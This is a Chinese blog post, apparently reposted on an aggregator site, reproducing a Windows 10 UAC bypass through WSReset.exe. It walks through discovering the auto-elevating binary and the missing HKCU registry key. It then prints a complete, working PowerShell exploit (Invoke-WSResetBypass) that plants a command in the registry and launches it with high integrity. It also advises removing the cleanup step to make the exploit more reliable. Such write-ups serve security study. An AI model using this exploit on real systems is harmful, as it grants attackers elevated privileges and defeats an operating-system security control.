内容简介:遇到了win10的环境就找了下bypassuac的.win10 1909 18363.535 Pro利用微软提供的
遇到了win10的环境就找了下bypassuac的.
环境
win10 1909 18363.535 Pro
复现
利用微软提供的 sigcheck.exe
签名检查 工具 发现 C:\Windows\System32\WSReset.exe
存在 autoElevate
属性为 true
使用Procmon64.exe添加过滤条件
没找到 HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
根据 微软文档 可知用户特定的设置优先于默认设置,而当前用户可以写入这个值,那么可以使用powershell来实现poc。
<# .SYNOPSIS Fileless UAC Bypass by Abusing Shell API Author: Hashim Jawad of ACTIVELabs .PARAMETER Command Specifies the command you would like to run in high integrity context. .EXAMPLE Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe" This will effectivly start cmd.exe in high integrity context. .NOTES This UAC bypass has been tested on the following: - Windows 10 Version 1803 OS Build 17134.590 - Windows 10 Version 1809 OS Build 17763.316 #> function Invoke-WSResetBypass { Param ( [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe" ) $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" New-Item $CommandPath -Force | Out-Null New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null Write-Host "[+] Registry entry has been created successfully!" $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden Write-Host "[+] Starting WSReset.exe" Write-Host "[+] Triggering payload.." Start-Sleep -Seconds 5 if (Test-Path $filePath) { Remove-Item $filePath -Recurse -Force Write-Host "[+] Cleaning up registry entry" } }
在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功,建议把powershell脚本去掉后面的清空注册表,避免WSReset运行时找不到注册表,不过记得手动清除。
参考
- https://www.activecyber.us/activelabs/windows-uac-bypass
- https://github.com/sailay1996/UAC_Bypass_In_The_Wild
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
以上所述就是小编给大家介绍的《Win10利用应用商店WSReset.exe进行bypassuac》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 袜子商店应用:一个云原生参照应用
- Purism 宣布推出 PureOS 应用商店
- 麒麟软件商店改版重构,重新定义设计美学
- vivo 应用商店推荐系统探索与实践
- Waterfox 55.0.2 发布,即将添加拓展商店
- Bootstrap和CSS3构建的简单商店
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。